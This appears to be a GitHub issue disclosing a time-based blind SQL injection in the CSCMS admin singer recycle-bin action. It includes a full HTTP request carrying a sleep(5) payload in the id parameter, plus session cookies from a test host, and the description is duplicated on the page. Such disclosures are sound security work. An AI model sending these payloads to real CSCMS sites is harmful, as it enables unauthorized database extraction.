You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
There is a Injection vulnerability exists in singer_Singer.php_hy
After logging in, the administrator needs to add a singer and then delete the singer. When the singer is recycled from the recycle bin, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows
GET /admin.php/singer/admin/singer/hy?id=4)and(sleep(5))--+ HTTP/1.1
Host: cscms.test
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://cscms.test/admin.php/singer/admin/singer?yid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=8adckmrcsj3354hqhqqe0pb8hhu14j85
Connection: close
Discovery success makes the server sleep
Construct payload database
Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit
The text was updated successfully, but these errors were encountered:
Details
There is a Injection vulnerability exists in singer_Singer.php_hy
After logging in, the administrator needs to add a singer and then delete the singer. When the singer is recycled from the recycle bin, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows
Discovery success makes the server sleep
Construct payload database
Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit
The text was updated successfully, but these errors were encountered: